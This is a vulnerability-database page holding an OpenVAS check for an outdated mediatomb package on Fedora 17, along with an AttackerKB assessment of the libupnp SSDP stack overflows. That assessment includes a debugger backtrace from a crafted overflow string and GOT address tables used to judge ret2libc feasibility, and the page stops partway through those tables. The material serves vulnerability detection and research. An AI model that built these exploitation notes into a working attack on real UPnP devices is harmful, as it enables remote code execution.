Search...

Fedora Update for mediatomb FEDORA-2013-2352

2013-02-22T00:00:00

ID OPENVAS:1361412562310865372
Type openvas
Reporter Copyright (c) 2013 Greenbone Networks GmbH
Modified 2019-03-15T00:00:00

Description

The remote host is missing an update for the

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for mediatomb FEDORA-2013-2352
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_xref(name:"URL", value:"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html");
  script_oid("1.3.6.1.4.1.25623.1.0.865372");
  script_version("$Revision: 14223 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2013-02-22 09:59:19 +0530 (Fri, 22 Feb 2013)");
  script_cve_id("CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_xref(name:"FEDORA", value:"2013-2352");
  script_name("Fedora Update for mediatomb FEDORA-2013-2352");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'mediatomb'
  package(s) announced via the referenced advisory.");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC17");
  script_tag(name:"affected", value:"mediatomb on Fedora 17");
  script_tag(name:"solution", value:"Please install the updated package(s).");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "FC17")
{

  if ((res = isrpmvuln(pkg:"mediatomb", rpm:"mediatomb~0.12.1~23.fc17", rls:"FC17")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310865372", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for mediatomb FEDORA-2013-2352", "description": "The remote host is missing an update for the ", "published": "2013-02-22T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865372", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["2013-2352", "http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html"], "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "lastseen": "2019-05-29T18:38:27", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:8F0E9A23-04D0-42B5-9735-9BC6A4D70879"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2615-1:87BCB", "DEBIAN:DSA-2614-1:2F670"]}, {"type": "cisco", "idList": ["CISCO-SA-20130129-UPNP"]}, {"type": "cert", "idList": ["VU:922681"]}, {"type": "freebsd", "idList": ["2EA6CE3D-6AFD-11E2-9D4E-BCAEC524BF84"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12852"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2615.NASL", "DEBIAN_DSA-2614.NASL", "FEDORA_2013-2377.NASL", "FREEBSD_PKG_2EA6CE3D6AFD11E29D4EBCAEC524BF84.NASL", "MANDRIVA_MDVSA-2013-098.NASL", "FEDORA_2013-1713.NASL", "FEDORA_2013-1765.NASL", "FEDORA_2013-2352.NASL", "FEDORA_2013-1734.NASL", "OPENSUSE-2013-90.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892615", "OPENVAS:892614", "OPENVAS:865371", "OPENVAS:1361412562310865353", "OPENVAS:1361412562310865345", "OPENVAS:1361412562310105882", "OPENVAS:865353", "OPENVAS:865372", "OPENVAS:865345", "OPENVAS:1361412562310865371"]}, {"type": "fedora", "idList": ["FEDORA:02152208BF", "FEDORA:7AED420F62", "FEDORA:4ECCF20F1C", "FEDORA:4299220A19", "FEDORA:8CF1320B49"]}, {"type": "exploitdb", "idList": ["EDB-ID:49119", "EDB-ID:24455"]}, {"type": "cve", "idList": ["CVE-2012-5963", "CVE-2012-5961", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5964", "CVE-2012-5959", "CVE-2013-2352", "CVE-2012-5965", "CVE-2012-5958"]}, {"type": "gentoo", "idList": ["GLSA-201403-06"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/UPNP/SSDP_MSEARCH", "MSF:EXPLOIT/MULTI/UPNP/LIBUPNP_SSDP_OVERFLOW"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160242"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}], "modified": "2019-05-29T18:38:27", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-29T18:38:27", "rev": 2}, "vulnersScore": 7.6}, "pluginID": "1361412562310865372", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediatomb FEDORA-2013-2352\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865372\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:19 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-2352\");\n script_name(\"Fedora Update for mediatomb FEDORA-2013-2352\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediatomb'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mediatomb on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediatomb\", rpm:\"mediatomb~0.12.1~23.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks", "immutableFields": []}

{"attackerkb": [{"lastseen": "2020-11-15T18:45:25", "bulletinFamily": "info", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a UDP packet with a crafted string that is not properly handled after a certain pointer subtraction.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n * How unique_service_name is reached?00 \n\n \n \n Breakpoint 4, unique_service_name (\n cmd=0x8053ad8 \"uuid:schemas:device:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"..., Evt=0xb57e6ca4) at src/ssdp/ssdp_server.c:496\n 496\t printf(\"[*] unique_service_name()\\n\");\n (gdb) bt\n #0 unique_service_name (\n cmd=0x8053ad8 \"uuid:schemas:device:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"..., Evt=0xb57e6ca4) at src/ssdp/ssdp_server.c:496\n #1 0x0013464a in ssdp_request_type (\n cmd=0x8053ad8 \"uuid:schemas:device:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"..., Evt=0xb57e7260) at src/ssdp/ssdp_server.c:624\n #2 0x001326c9 in ssdp_handle_device_request (hmsg=0x8051bb0, dest_addr=0x8051c8c) at src/ssdp/ssdp_device.c:127\n #3 0x001341e8 in ssdp_event_handler_thread (the_data=0x8051bb0) at src/ssdp/ssdp_server.c:787\n #4 0x0015f306 in WorkerThread (arg=0x15b340) at src/ThreadPool.c:533\n #5 0x0017596e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0\n #6 0x00256a4e in clone () from /lib/tls/i686/cmov/libc.so.6\n \n\n * CVE-2012-5958 \n\n\nTempBuf Overflowed, at the current stack frame\n\n * CVE-2012-5959, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965, CVE-2012-5960 \n\n\nEvt members overflowed. Evt stored at the ssdp_handle_device_request frame:\n \n \n ssdp_handle_device_request( IN http_message_t * hmsg, IN struct sockaddr_in *dest_addr )\n \n int handle;\n struct Handle_Info *dev_info = NULL;\n memptr hdr_value;\n int mx;\n char save_char;\n SsdpEvent event; <==\n int ret_code;\n SsdpSearchReply *threadArg = NULL;\n ThreadPoolJob job;\n int replyTime;\n int maxAge;\n \n\n * CVE-2012-5958, assuming no PIE for the main executable, which has been found in the wild, having into account \nwhich goodchars are from 0x01-0x7f or 0x80-0xff (with exceptions), doesn\u2019t seem feasible to use any of these \naddresses to make a type of ret2libc: \n\n\n(1) .got.plt for upnp_tv_device, the check program linked with libupnp (compiled on ubuntu 10.04 with \ngcc flags to disable stack-cookies and fortify libc checks)\n \n \n .got.plt:0804F000 off_804F000 dd offset UpnpInit ; DATA XREF: _UpnpInitr\n .got.plt:0804F004 off_804F004 dd offset sigemptyset ; DATA XREF: _sigemptysetr\n .got.plt:0804F008 off_804F008 dd offset UpnpSendAdvertisement\n .got.plt:0804F008 ; DATA XREF: _UpnpSendAdvertisementr\n .got.plt:0804F00C off_804F00C dd offset sprintf ; DATA XREF: _sprintfr\n .got.plt:0804F010 off_804F010 dd offset ixmlPrintNode ; DATA XREF: _ixmlPrintNoder\n .got.plt:0804F014 off_804F014 dd offset ixmlNode_getNodeType\n .got.plt:0804F014 ; DATA XREF: _ixmlNode_getNodeTyper\n .got.plt:0804F018 off_804F018 dd offset __gmon_start__ ; DATA XREF: ___gmon_start__r\n .got.plt:0804F01C off_804F01C dd offset __isoc99_sscanf ; DATA XREF: ___isoc99_sscanfr\n .got.plt:0804F020 off_804F020 dd offset UpnpUnRegisterRootDevice\n .got.plt:0804F020 ; DATA XREF: _UpnpUnRegisterRootDevicer\n .got.plt:0804F024 off_804F024 dd offset vsnprintf ; DATA XREF: _vsnprintfr\n .got.plt:0804F028 off_804F028 dd offset ixmlNode_getFirstChild\n .got.plt:0804F028 ; DATA XREF: _ixmlNode_getFirstChildr\n .got.plt:0804F02C off_804F02C dd offset fgets ; DATA XREF: _fgetsr\n .got.plt:0804F030 off_804F030 dd offset ixmlNode_getNodeValue\n .got.plt:0804F030 ; DATA XREF: _ixmlNode_getNodeValuer\n .got.plt:0804F034 off_804F034 dd offset __libc_start_main\n .got.plt:0804F034 ; DATA XREF: ___libc_start_mainr\n .got.plt:0804F038 off_804F038 dd offset UpnpAddToActionResponse\n .got.plt:0804F038 ; DATA XREF: _UpnpAddToActionResponser\n .got.plt:0804F03C off_804F03C dd offset ixmlNodeList_length\n .got.plt:0804F03C ; DATA XREF: _ixmlNodeList_lengthr\n .got.plt:0804F040 off_804F040 dd offset UpnpGetServerIpAddress\n .got.plt:0804F040 ; DATA XREF: _UpnpGetServerIpAddressr\n .got.plt:0804F044 off_804F044 dd offset __assert_fail ; DATA XREF: ___assert_failr\n .got.plt:0804F048 off_804F048 dd offset pthread_mutexattr_setkind_np\n .got.plt:0804F048 ; DATA XREF: _pthread_mutexattr_setkind_npr\n .got.plt:0804F04C off_804F04C dd offset UpnpAcceptSubscription\n .got.plt:0804F04C ; DATA XREF: _UpnpAcceptSubscriptionr\n .got.plt:0804F050 off_804F050 dd offset UpnpResolveURL ; DATA XREF: _UpnpResolveURLr\n .got.plt:0804F054 off_804F054 dd offset sigwait ; DATA XREF: _sigwaitr\n .got.plt:0804F058 off_804F058 dd offset strtol ; DATA XREF: _strtolr\n .got.plt:0804F05C off_804F05C dd offset free ; DATA XREF: _freer\n .got.plt:0804F060 off_804F060 dd offset ixmlCloneDOMString\n .got.plt:0804F060 ; DATA XREF: _ixmlCloneDOMStringr\n .got.plt:0804F064 off_804F064 dd offset pthread_mutex_unlock\n .got.plt:0804F064 ; DATA XREF: _pthread_mutex_unlockr\n .got.plt:0804F068 off_804F068 dd offset UpnpGetServerPort\n .got.plt:0804F068 ; DATA XREF: _UpnpGetServerPortr\n .got.plt:0804F06C off_804F06C dd offset pthread_mutexattr_destroy\n .got.plt:0804F06C ; DATA XREF: _pthread_mutexattr_destroyr\n .got.plt:0804F070 off_804F070 dd offset ixmlNodeList_free\n .got.plt:0804F070 ; DATA XREF: _ixmlNodeList_freer\n .got.plt:0804F074 off_804F074 dd offset ixmlDocument_free\n .got.plt:0804F074 ; DATA XREF: _ixmlDocument_freer\n .got.plt:0804F078 off_804F078 dd offset strlen ; DATA XREF: _strlenr\n .got.plt:0804F07C off_804F07C dd offset pthread_mutex_destroy\n .got.plt:0804F07C ; DATA XREF: _pthread_mutex_destroyr\n .got.plt:0804F080 off_804F080 dd offset strcpy ; DATA XREF: _strcpyr\n .got.plt:0804F084 off_804F084 dd offset printf ; DATA XREF: _printfr\n .got.plt:0804F088 off_804F088 dd offset pthread_mutex_init\n .got.plt:0804F088 ; DATA XREF: _pthread_mutex_initr\n .got.plt:0804F08C off_804F08C dd offset strcasecmp ; DATA XREF: _strcasecmpr\n .got.plt:0804F090 off_804F090 dd offset malloc ; DATA XREF: _mallocr\n .got.plt:0804F094 off_804F094 dd offset pthread_mutex_lock\n .got.plt:0804F094 ; DATA XREF: _pthread_mutex_lockr\n .got.plt:0804F098 off_804F098 dd offset UpnpDownloadXmlDoc\n .got.plt:0804F098 ; DATA XREF: _UpnpDownloadXmlDocr\n .got.plt:0804F09C off_804F09C dd offset UpnpSetWebServerRootDir\n .got.plt:0804F09C ; DATA XREF: _UpnpSetWebServerRootDirr\n .got.plt:0804F0A0 off_804F0A0 dd offset pthread_create ; DATA XREF: _pthread_creater\n .got.plt:0804F0A4 off_804F0A4 dd offset sigaddset ; DATA XREF: _sigaddsetr\n .got.plt:0804F0A8 off_804F0A8 dd offset ixmlElement_getElementsByTagName\n .got.plt:0804F0A8 ; DATA XREF: _ixmlElement_getElementsByTagNamer\n .got.plt:0804F0AC off_804F0AC dd offset UpnpFinish ; DATA XREF: _UpnpFinishr\n .got.plt:0804F0B0 off_804F0B0 dd offset UpnpRegisterRootDevice\n .got.plt:0804F0B0 ; DATA XREF: _UpnpRegisterRootDevicer\n .got.plt:0804F0B4 off_804F0B4 dd offset UpnpNotify ; DATA XREF: _UpnpNotifyr\n .got.plt:0804F0B8 off_804F0B8 dd offset ixmlNodeList_item\n .got.plt:0804F0B8 ; DATA XREF: _ixmlNodeList_itemr\n .got.plt:0804F0BC off_804F0BC dd offset snprintf ; DATA XREF: _snprintfr\n .got.plt:0804F0C0 off_804F0C0 dd offset pthread_mutexattr_init\n .got.plt:0804F0C0 ; DATA XREF: _pthread_mutexattr_initr\n .got.plt:0804F0C4 off_804F0C4 dd offset strcmp ; DATA XREF: _strcmpr\n .got.plt:0804F0C8 off_804F0C8 dd offset __strdup ; DATA XREF: ___strdupr\n .got.plt:0804F0CC off_804F0CC dd offset exit ; DATA XREF: _exitr\n .got.plt:0804F0D0 off_804F0D0 dd offset ixmlFreeDOMString\n .got.plt:0804F0D0 ; DATA XREF: _ixmlFreeDOMStringr\n .got.plt:0804F0D4 off_804F0D4 dd offset ixmlDocument_getElementsByTagName\n .got.plt:0804F0D4 ; DATA XREF: _ixmlDocument_getElementsByTagNamer\n .got.plt:0804F0D4 _got_plt ends\n .got.plt:0804F0D4\n \n\n * For the dms executable \n\n \n \n .got.plt:080BA208 off_80BA208 dd offset __cxa_end_catch ; DATA XREF: ___cxa_end_catchr\n .got.plt:080BA20C off_80BA20C dd offset __cxa_rethrow ; DATA XREF: ___cxa_rethrowr\n .got.plt:080BA210 off_80BA210 dd offset _ZN11MediaServer15GetAbsolutePathERKSs\n .got.plt:080BA210 ; DATA XREF: MediaServer::GetAbsolutePath(std::string const&)r\n .got.plt:080BA210 ; MediaServer::GetAbsolutePath(std::string const&)\n .got.plt:080BA214 off_80BA214 dd offset _ZN14SynoAudioUtils25RadioGetGenreStationCountEj\n .got.plt:080BA214 ; DATA XREF: SynoAudioUtils::RadioGetGenreStationCount(uint)r\n .got.plt:080BA214 ; SynoAudioUtils::RadioGetGenreStationCount(uint)\n .got.plt:080BA218 off_80BA218 dd offset UpnpInit ; DATA XREF: _UpnpInitr\n .got.plt:080BA21C off_80BA21C dd offset UpnpSetVirtualDirCallbacks\n .got.plt:080BA21C ; DATA XREF: _UpnpSetVirtualDirCallbacksr\n .got.plt:080BA220 off_80BA220 dd offset mkdir ; DATA XREF: _mkdirr\n .got.plt:080BA224 off_80BA224 dd offset pthread_getspecific\n .got.plt:080BA224 ; DATA XREF: _pthread_getspecificr\n .got.plt:080BA228 off_80BA228 dd offset _ZN11MediaServer7MediaDB12AddConditionERKSs\n .got.plt:080BA228 ; DATA XREF: MediaServer::MediaDB::AddCondition(std::string const&)r\n .got.plt:080BA228 ; MediaServer::MediaDB::AddCondition(std::string const&)\n .got.plt:080BA22C off_80BA22C dd offset _ZN11MediaServer15DMSStringBundle9TranslateERKSs\n .got.plt:080BA22C ; DATA XREF: MediaServer::DMSStringBundle::Translate(std::string const&)r\n .got.plt:080BA22C ; MediaServer::DMSStringBundle::Translate(std::string const&)\n .got.plt:080BA230 off_80BA230 dd offset ixmlNode_getFirstChild\n .got.plt:080BA230 ; DATA XREF: _ixmlNode_getFirstChildr\n .got.plt:080BA234 off_80BA234 dd offset _ZN11MediaServer7MediaDB10FetchFieldEPKc\n .got.plt:080BA234 ; DATA XREF: MediaServer::MediaDB::FetchField(char const*)r\n .got.plt:080BA234 ; MediaServer::MediaDB::FetchField(char const*)\n .got.plt:080BA238 off_80BA238 dd offset _ZN11MediaServer18DMSGetThumbnailResEiiPiS0_i\n .got.plt:080BA238 ; DATA XREF: MediaServer::DMSGetThumbnailRes(int,int,int *,int *,int)r\n .got.plt:080BA238 ; MediaServer::DMSGetThumbnailRes(int,int,int *,int *,int)\n .got.plt:080BA23C off_80BA23C dd offset _ZNSt8ios_base4InitC1Ev\n .got.plt:080BA23C ; DATA XREF: std::ios_base::Init::Init(void)r\n .got.plt:080BA23C ; std::ios_base::Init::Init(void)\n .got.plt:080BA240 off_80BA240 dd offset strchr ; DATA XREF: _strchrr\n .got.plt:080BA244 off_80BA244 dd offset _ZN11MediaServer21XMLGetElmentTextValueEP10_IXML_Node\n .got.plt:080BA244 ; DATA XREF: MediaServer::XMLGetElmentTextValue(_IXML_Node *)r\n .got.plt:080BA244 ; MediaServer::XMLGetElmentTextValue(_IXML_Node *)\n .got.plt:080BA248 off_80BA248 dd offset _ZN11MediaServer19DMSGetProductSerialEv\n .got.plt:080BA248 ; DATA XREF: MediaServer::DMSGetProductSerial(void)r\n .got.plt:080BA248 ; MediaServer::DMSGetProductSerial(void)\n .got.plt:080BA24C off_80BA24C dd offset _ZN4Json18StyledStreamWriterC1ESs\n .got.plt:080BA24C ; DATA XREF: Json::StyledStreamWriter::StyledStreamWriter(std::string)r\n .got.plt:080BA24C ; Json::StyledStreamWriter::StyledStreamWriter(std::string)\n .got.plt:080BA250 off_80BA250 dd offset _ZNKSs13find_first_ofEPKcjj\n .got.plt:080BA250 ; DATA XREF: std::string::find_first_of(char const*,uint,uint)r\n .got.plt:080BA250 ; std::string::find_first_of(char const*,uint,uint)\n .got.plt:080BA254 off_80BA254 dd offset _ZN14SynoAudioUtils17RadioGetGenreDataEjRNS_10RadioGenreE\n .got.plt:080BA254 ; DATA XREF: SynoAudioUtils::RadioGetGenreData(uint,SynoAudioUtils::RadioGenre &)r\n .got.plt:080BA254 ; SynoAudioUtils::RadioGetGenreData(uint,SynoAudioUtils::RadioGenre &)\n .got.plt:080BA258 off_80BA258 dd offset _ZN4Json5ValueC1ENS_9ValueTypeE\n .got.plt:080BA258 ; DATA XREF: Json::Value::Value(Json::ValueType)r\n .got.plt:080BA258 ; Json::Value::Value(Json::ValueType)\n .got.plt:080BA25C off_80BA25C dd offset _ZNSt6localeD1Ev\n .got.plt:080BA25C ; DATA XREF: std::locale::~locale()r\n .got.plt:080BA25C ; std::locale::~locale()\n .got.plt:080BA260 off_80BA260 dd offset getopt_long_only ; DATA XREF: _getopt_long_onlyr\n .got.plt:080BA264 off_80BA264 dd offset _ZNKSs5rfindEPKcjj\n .got.plt:080BA264 ; DATA XREF: std::string::rfind(char const*,uint,uint)r\n .got.plt:080BA264 ; std::string::rfind(char const*,uint,uint)\n .got.plt:080BA268 off_80BA268 dd offset getpid ; DATA XREF: _getpidr\n .got.plt:080BA26C off_80BA26C dd offset _ZN7pcrecpp2RE4InitERKSsPKNS_10RE_OptionsE\n .got.plt:080BA26C ; DATA XREF: pcrecpp::RE::Init(std::string const&,pcrecpp::RE_Options const*)r\n .got.plt:080BA26C ; pcrecpp::RE::Init(std::string const&,pcrecpp::RE_Options const*)\n .got.plt:080BA270 off_80BA270 dd offset strdup ; DATA XREF: _strdupr\n .got.plt:080BA274 off_80BA274 dd offset appendPQExpBuffer\n .got.plt:080BA274 ; DATA XREF: _appendPQExpBufferr\n .got.plt:080BA278 off_80BA278 dd offset _ZN11MediaServer15DMSStringBundleC1ERKSs\n .got.plt:080BA278 ; DATA XREF: MediaServer::DMSStringBundle::DMSStringBundle(std::string const&)r\n .got.plt:080BA278 ; MediaServer::DMSStringBundle::DMSStringBundle(std::string const&)\n .got.plt:080BA27C off_80BA27C dd offset _ZN11MediaServer13DMSClientList4LoadERKSsS2_\n .got.plt:080BA27C ; DATA XREF: MediaServer::DMSClientList::Load(std::string const&,std::string const&)r\n .got.plt:080BA27C ; MediaServer::DMSClientList::Load(std::string const&,std::string const&)\n .got.plt:080BA280 off_80BA280 dd offset SYNODlnaContainerTypeGet\n .got.plt:080BA280 ; DATA XREF: _SYNODlnaContainerTypeGetr\n .got.plt:080BA284 off_80BA284 dd offset UpnpRegisterClient\n .got.plt:080BA284 ; DATA XREF: _UpnpRegisterClientr\n .got.plt:080BA288 off_80BA288 dd offset UpnpSearchAsync ; DATA XREF: _UpnpSearchAsyncr\n .got.plt:080BA28C off_80BA28C dd offset write ; DATA XREF: _writer\n .got.plt:080BA290 off_80BA290 dd offset strcmp ; DATA XREF: _strcmpr\n .got.plt:080BA294 off_80BA294 dd offset _ZN14SynoAudioUtils15SmartPLSGetNameEi\n .got.plt:080BA294 ; DATA XREF: SynoAudioUtils::SmartPLSGetName(int)r\n .got.plt:080BA294 ; SynoAudioUtils::SmartPLSGetName(int)\n .got.plt:080BA298 off_80BA298 dd offset _ZNSt8ios_baseC2Ev\n .got.plt:080BA298 ; DATA XREF: std::ios_base::ios_base(void)r\n .got.plt:080BA298 ; std::ios_base::ios_base(void)\n .got.plt:080BA29C off_80BA29C dd offset _ZN11MediaServer13DMSClientList11EraseObjectERKSs\n .got.plt:080BA29C ; DATA XREF: MediaServer::DMSClientList::EraseObject(std::string const&)r\n .got.plt:080BA29C ; MediaServer::DMSClientList::EraseObject(std::string const&)\n .got.plt:080BA2A0 off_80BA2A0 dd offset close ; DATA XREF: _closer\n .got.plt:080BA2A4 off_80BA2A4 dd offset SYNODBClose ; DATA XREF: destr_function:_SYNODBCloser\n .got.plt:080BA2A8 off_80BA2A8 dd offset _ZNSt13basic_filebufIcSt11char_traitsIcEE5closeEv\n .got.plt:080BA2A8 ; DATA XREF: std::basic_filebuf<char,std::char_traits<char>>::close(void)r\n .got.plt:080BA2A8 ; std::basic_filebuf<char,std::char_traits<char>>::close(void)\n .got.plt:080BA2AC off_80BA2AC dd offset _ZN14SynoAudioUtils18RadioGetGenreCountEv\n .got.plt:080BA2AC ; DATA XREF: SynoAudioUtils::RadioGetGenreCount(void)r\n .got.plt:080BA2AC ; SynoAudioUtils::RadioGetGenreCount(void)\n .got.plt:080BA2B0 off_80BA2B0 dd offset _ZN11MediaServer16DMSGetProductUDNEv\n .got.plt:080BA2B0 ; DATA XREF: MediaServer::DMSGetProductUDN(void)r\n .got.plt:080BA2B0 ; MediaServer::DMSGetProductUDN(void)\n .got.plt:080BA2B4 off_80BA2B4 dd offset fprintf ; DATA XREF: _fprintfr\n .got.plt:080BA2B8 off_80BA2B8 dd offset SYNOAacObjectTypeGet\n .got.plt:080BA2B8 ; DATA XREF: _SYNOAacObjectTypeGetr\n .got.plt:080BA2BC off_80BA2BC dd offset pcre_fullinfo ; DATA XREF: _pcre_fullinfor\n .got.plt:080BA2C0 off_80BA2C0 dd offset signal ; DATA XREF: _signalr\n .got.plt:080BA2C4 off_80BA2C4 dd offset UpnpSendAdvertisement\n .got.plt:080BA2C4 ; DATA XREF: _UpnpSendAdvertisementr\n .got.plt:080BA2C8 off_80BA2C8 dd offset _ZN11MediaServer7MediaDB15FetchFieldAsIntEPKc\n .got.plt:080BA2C8 ; DATA XREF: MediaServer::MediaDB::FetchFieldAsInt(char const*)r\n .got.plt:080BA2C8 ; MediaServer::MediaDB::FetchFieldAsInt(char const*)\n .got.plt:080BA2CC off_80BA2CC dd offset ixmlNodeList_length\n .got.plt:080BA2CC ; DATA XREF: _ixmlNodeList_lengthr\n .got.plt:080BA2D0 off_80BA2D0 dd offset _ZN11MediaServer25GetMACAddressFromARPTableERKSs\n .got.plt:080BA2D0 ; DATA XREF: MediaServer::GetMACAddressFromARPTable(std::string const&)r\n .got.plt:080BA2D0 ; MediaServer::GetMACAddressFromARPTable(std::string const&)\n .got.plt:080BA2D4 off_80BA2D4 dd offset unlink ; DATA XREF: _unlinkr\n .got.plt:080BA2D8 off_80BA2D8 dd offset _ZNSt13basic_filebufIcSt11char_traitsIcEE4openEPKcSt13_Ios_Openmode\n .got.plt:080BA2D8 ; DATA XREF: std::basic_filebuf<char,std::char_traits<char>>::open(char const*,std::_Ios_Openmode)r\n 